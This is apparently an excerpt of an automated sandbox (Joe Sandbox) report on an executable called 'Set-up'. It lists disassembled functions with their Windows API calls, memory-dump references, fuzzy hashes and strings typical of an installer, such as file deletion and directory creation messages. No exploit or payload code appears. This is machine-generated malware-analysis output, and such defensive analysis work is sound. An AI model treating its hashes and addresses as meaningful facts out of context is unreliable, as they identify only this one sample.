                                                                    • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                    • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                    • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                    Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                    • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                    • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                    • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                    • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                    Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                    • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                    • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                    • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                    Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                    Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                    • String ID:
                                                                    • API String ID: 4115351271-0
                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                    Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                    • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                    • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                    • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                    Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                    • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                    • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                    • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                    Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                    • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                    • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                    • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                    Non-executed Functions

                                                                    Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $ @$M$N
                                                                    • API String ID: 1638840714-3479655940
                                                                    • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                    • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                    Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                    Strings
                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                    • \*.*, xrefs: 00406D2F
                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                    • ptF, xrefs: 00406D1A
                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                    • API String ID: 2035342205-1650287579
                                                                    • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                    • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                    • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                    • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                    Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004246CD,74DF23A0,00000000), ref: 00406902
                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1716102273.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.1716082554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716124324.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716139974.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1716244935.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
